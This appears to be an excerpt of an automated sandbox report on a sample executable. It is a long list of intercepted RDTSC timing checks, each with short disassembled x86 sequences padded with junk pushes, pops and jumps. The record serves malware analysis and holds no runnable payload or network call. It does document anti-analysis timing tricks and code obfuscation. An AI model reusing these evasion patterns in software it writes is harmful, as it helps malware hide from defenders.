                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21E4B second address: E21E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E17F96 second address: E17FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39717h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E17FB4 second address: E17FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D3F156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E17FC0 second address: E17FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4BA0D3970Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E17FD7 second address: E17FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E3FBAA second address: E3FBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E3FFEF second address: E3FFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E3FFF3 second address: E3FFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E406BB second address: E406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E406C1 second address: E406E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4BA0D39706h 0x0000000a jnl 00007F4BA0D39706h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D3970Fh 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E406E5 second address: E4070D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a jno 00007F4BA0D3F167h 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E3576D second address: E35771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E35771 second address: E35775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E40A04 second address: E40A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39714h 0x00000007 pushad 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E40A3E second address: E40A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E410F9 second address: E410FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E413E5 second address: E413EF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E413EF second address: E41413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F4BA0D39714h 0x0000000d push esi 0x0000000e jl 00007F4BA0D39706h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E19BCE second address: E19BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4BA0D3F15Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E47B58 second address: E47B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E47F21 second address: E47F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4CEA8 second address: E4CEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4CEB0 second address: E4CEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4CEBC second address: E4CEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E16412 second address: E16425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4BA0D3F15Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C462 second address: E4C47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 jp 00007F4BA0D39706h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C606 second address: E4C622 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F158h 0x00000008 jmp 00007F4BA0D3F15Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C622 second address: E4C65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F4BA0D39716h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4BA0D39706h 0x00000014 jmp 00007F4BA0D39713h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C65A second address: E4C660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4CBB2 second address: E4CBE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4BA0D39719h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4BA0D3970Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4E6CA second address: E4E6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4EAA2 second address: E4EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4EF9E second address: E4EFD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov edi, dword ptr [ebp+122D2AF7h] 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4BA0D3F156h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F1BF second address: E4F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F4BB second address: E4F502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 pushad 0x00000024 js 00007F4BA0D3F157h 0x0000002a stc 0x0000002b adc ch, FFFFFFF5h 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F4BA0D3F15Eh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F502 second address: E4F508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F508 second address: E4F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F9FB second address: E4F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F9FF second address: E4FA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50444 second address: E5044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5044A second address: E5047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4BA0D3F165h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E515B5 second address: E515B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50C60 second address: E50C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50C64 second address: E50C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50C68 second address: E50C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52C7B second address: E52C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52C8B second address: E52C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D29 second address: E52D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D2D second address: E52D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D31 second address: E52D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D37 second address: E52D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D3D second address: E52D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E54E3E second address: E54EDA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F158h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4BA0D3F158h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jne 00007F4BA0D3F16Eh 0x0000002f mov dword ptr [ebp+122D2848h], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F4BA0D3F158h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 jmp 00007F4BA0D3F166h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jmp 00007F4BA0D3F15Ch 0x00000061 pop eax 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E581C1 second address: E581F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov bx, 7DB9h 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+1246C301h] 0x00000015 push 00000000h 0x00000017 mov bl, CAh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D39712h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E581F1 second address: E581F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E581F5 second address: E581FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59051 second address: E59068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59F0A second address: E59F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59F0E second address: E59F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59F14 second address: E59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5AEBE second address: E5AEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jc 00007F4BA0D3F156h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5AEDE second address: E5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5833C second address: E58342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5A090 second address: E5A09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4BA0D39706h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5B13E second address: E5B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5913B second address: E59142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5D0BF second address: E5D0DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5DF22 second address: E5DF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D39706h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F4BA0D3971Fh 0x00000012 pushad 0x00000013 jmp 00007F4BA0D39711h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59201 second address: E59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5D0DA second address: E5D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4BA0D39708h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov di, C9A0h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov edi, 4862E83Ah 0x0000003b mov eax, dword ptr [ebp+122D0A21h] 0x00000041 jmp 00007F4BA0D39710h 0x00000046 push FFFFFFFFh 0x00000048 push eax 0x00000049 add bx, 3F2Bh 0x0000004e pop ebx 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F4BA0D39713h 0x00000056 jng 00007F4BA0D39708h 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 push esi 0x00000061 pushad 0x00000062 push edx 0x00000063 pop edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5E059 second address: E5E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5E05E second address: E5E075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4BA0D3970Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF6E second address: E5FF78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D3F15Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF78 second address: E5FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF85 second address: E5FF8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF8F second address: E5FF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E6313E second address: E63143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E63143 second address: E63149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E63149 second address: E6315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F15Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E6315F second address: E63164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E601EC second address: E601F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E62249 second address: E6224F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E6224F second address: E62253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E650C5 second address: E65112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4BA0D39713h 0x0000000c popad 0x0000000d jmp 00007F4BA0D39719h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4BA0D3970Ah 0x0000001b pushad 0x0000001c jnc 00007F4BA0D39706h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E65112 second address: E65117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66811 second address: E668B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 jmp 00007F4BA0D3970Dh 0x00000015 popad 0x00000016 jmp 00007F4BA0D39716h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4BA0D39708h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 jmp 00007F4BA0D39711h 0x0000003c mov dword ptr [ebp+122D280Dh], ebx 0x00000042 push 00000000h 0x00000044 mov ebx, 2259C726h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F4BA0D39708h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1F09h], esi 0x0000006b xchg eax, esi 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F4BA0D39706h 0x00000075 rdtsc
